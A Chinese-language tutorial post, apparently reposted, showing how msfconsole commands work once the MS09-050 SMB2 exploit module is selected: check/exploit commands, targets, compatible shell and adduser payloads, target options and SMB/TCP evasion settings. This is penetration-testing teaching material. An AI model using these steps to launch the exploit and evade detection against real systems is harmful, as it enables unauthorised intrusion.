Metasploit 如何使用Exploits(漏洞)

在Metasploit中选择一个漏洞利用程序将’exploit’和’check’命令添加到msfconsole。

msf > use  exploit/windows/smb/ms09\_050\_smb2\_negotiate\_func\_indexmsf exploit(ms09\_050\_smb2\_negotiate\_func\_index) > help...略...Exploit 命令================    命   令       描    述    -------       -----------    check         检查目标是否易受攻击    exploit       启动漏洞利用尝试    pry           在当前模块上打开一个Pry会话    rcheck        重新加载模块并检查目标是否存在漏洞    reload        只需重新加载模块    rerun         重新运行exploit(漏洞)的别名    rexploit      重新加载模块并启动漏洞攻击尝试    run           运行exploit(漏洞)的别名msf exploit(ms09\_050\_smb2\_negotiate\_func_index) >

show

使用exploits(漏洞)还会为’show’命令添加更多选项。

MSF Exploit Targets(漏洞目标):

msf exploit(ms09\_050\_smb2\_negotiate\_func_index) > show targetsExploit targets:   Id  Name   --  ----   0   Windows Vista SP1/SP2 and Server 2008 (x86)

MSF Exploit Payloads(漏洞有效载荷):

msf exploit(ms09\_050\_smb2\_negotiate\_func\_index) > show payloadsCompatible Payloads===================   Name                              Disclosure Date  Rank    Description   ----                              ---------------  ----    -----------   generic/custom                                     normal  Custom Payload   generic/debug\_trap                                 normal  Generic x86 Debug Trap   generic/shell\_bind\_tcp                             normal  Generic Command Shell, Bind TCP Inline   generic/shell\_reverse\_tcp                          normal  Generic Command Shell, Reverse TCP Inline   generic/tight_loop                                 normal  Generic x86 Tight Loop   windows/adduser                                    normal  Windows Execute net user /ADD...略...

MSF Exploit Options(漏洞选项):

msf exploit(ms09\_050\_smb2\_negotiate\_func\_index) > show optionsModule options (exploit/windows/smb/ms09\_050\_smb2\_negotiate\_func\_index):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   RHOST  192.168.1.136    yes       The target address   RPORT  445              yes       The target port (TCP)   WAIT   180              yes       The number of seconds to wait for the attack to complete.Exploit target:   Id  Name   --  ----   0   Windows Vista SP1/SP2 and Server 2008 (x86)

Advanced(高级):

msf exploit(ms09\_050\_smb2\_negotiate\_func\_index) > show advancedModule advanced options (exploit/windows/smb/ms09\_050\_smb2\_negotiate\_func\_index):   Name                    Current Setting    Required  Description   ----                    ---------------    --------  -----------   CHOST                                      no        The local client address   CPORT                                      no        The local client port   ConnectTimeout          10                 yes       Maximum number of seconds to establish a TCP connection   ContextInformationFile                     no        The information file that contains context information   DisablePayloadHandler   false              no        Disable the handler code for the selected payload   EnableContextEncoding   false              no        Use transient context when encoding payloads...略...

Evasion(越狱):

msf exploit(ms09\_050\_smb2\_negotiate\_func\_index) > show evasionModule evasion options:   Name                           Current Setting  Required  Description   ----                           ---------------  --------  -----------   SMB::obscure\_trans\_pipe\_level  0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)   SMB::pad\_data\_level            0                yes       Place extra padding between headers and data (level 0-3)   SMB::pad\_file\_level            0                yes       Obscure path names used in open/create (level 0-3)   SMB::pipe\_evasion              false            yes       Enable segmented read/writes for SMB Pipes   SMB::pipe\_read\_max\_size        1024             yes       Maximum buffer size for pipe reads   SMB::pipe\_read\_min\_size        1                yes       Minimum buffer size for pipe reads   SMB::pipe\_write\_max\_size       1024             yes       Maximum buffer size for pipe writes   SMB::pipe\_write\_min\_size       1                yes       Minimum buffer size for pipe writes   TCP::max\_send\_size             0                no        Maxiumum tcp segment size.  (0 = disable)   TCP::send\_delay                0                no        Delays inserted before every send.  (0 = disable)转:https://www.fujieace.com/metasploit/exploits.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安溦寀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值